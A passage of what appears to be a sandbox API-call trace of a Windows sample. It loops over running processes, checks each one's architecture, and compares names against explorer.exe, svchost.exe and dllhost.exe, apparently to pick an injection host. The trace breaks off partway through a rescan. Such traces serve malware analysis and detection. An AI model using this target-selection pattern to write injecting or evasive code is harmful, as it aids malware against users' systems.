cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0229.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0229.312] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.312] CloseHandle (hObject=0xd8) returned 1 [0229.312] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0229.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0229.312] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.312] CloseHandle (hObject=0xd8) returned 1 [0229.312] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0229.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0229.313] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.313] CloseHandle (hObject=0xd8) returned 1 [0229.313] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0229.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0229.314] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.314] CloseHandle (hObject=0xd8) returned 1 [0229.314] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0229.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0229.314] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.314] CloseHandle (hObject=0xd8) returned 1 [0229.314] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0229.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0229.315] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.315] CloseHandle (hObject=0xd8) returned 1 [0229.315] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0229.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0229.315] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.315] CloseHandle (hObject=0xd8) returned 1 [0229.315] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0229.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0229.316] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.316] CloseHandle (hObject=0xd8) returned 1 [0229.316] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0229.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0229.317] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.317] CloseHandle (hObject=0xd8) returned 1 [0229.317] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0229.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0229.317] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.317] CloseHandle (hObject=0xd8) returned 1 [0229.317] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0229.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0229.318] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.318] CloseHandle (hObject=0xd8) returned 1 [0229.318] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0229.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0229.319] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.319] CloseHandle (hObject=0xd8) returned 1 [0229.319] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0229.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0229.319] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.320] CloseHandle (hObject=0xd8) returned 1 [0229.320] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0229.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0229.320] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.320] CloseHandle (hObject=0xd8) returned 1 [0229.320] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0229.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0229.321] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.321] CloseHandle (hObject=0xd8) returned 1 [0229.321] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0229.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0229.321] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.321] CloseHandle (hObject=0xd8) returned 1 [0229.321] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0229.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0229.322] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.322] CloseHandle (hObject=0xd8) returned 1 [0229.322] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0229.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0229.322] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.322] CloseHandle (hObject=0xd8) returned 1 [0229.323] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0229.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0229.323] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.323] CloseHandle (hObject=0xd8) returned 1 [0229.323] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0229.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0229.324] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.324] CloseHandle (hObject=0xd8) returned 1 [0229.324] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0229.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0229.324] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.324] CloseHandle (hObject=0xd8) returned 1 [0229.324] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0229.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0229.325] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0229.325] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0229.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0229.326] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0229.326] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0229.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0229.327] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0229.327] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.327] CloseHandle (hObject=0xd8) returned 1 [0229.327] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0229.327] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0229.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0229.328] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.328] CloseHandle (hObject=0xd8) returned 1 [0229.328] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0229.328] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0229.328] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0229.328] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0229.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0229.329] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0229.330] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.330] CloseHandle (hObject=0xd8) returned 1 [0229.330] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0229.330] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.330] CloseHandle (hObject=0xd8) returned 1 [0229.330] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0229.330] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0229.331] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.331] CloseHandle (hObject=0xd8) returned 1 [0229.331] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.331] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0229.332] CloseHandle (hObject=0xd4) returned 1 [0229.332] Sleep (dwMilliseconds=0x3e8) [0230.343] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0230.344] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0230.345] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0230.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0230.346] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0230.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0230.346] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0230.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0230.347] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0230.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0230.347] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0230.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0230.348] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0230.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0230.348] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0230.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0230.349] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0230.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0230.349] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0230.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0230.350] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0230.350] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0230.351] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0230.351] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0230.352] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0230.352] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0230.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0230.352] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0230.353] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0230.353] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0230.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0230.354] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.354] CloseHandle (hObject=0xd8) returned 1 [0230.354] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0230.354] 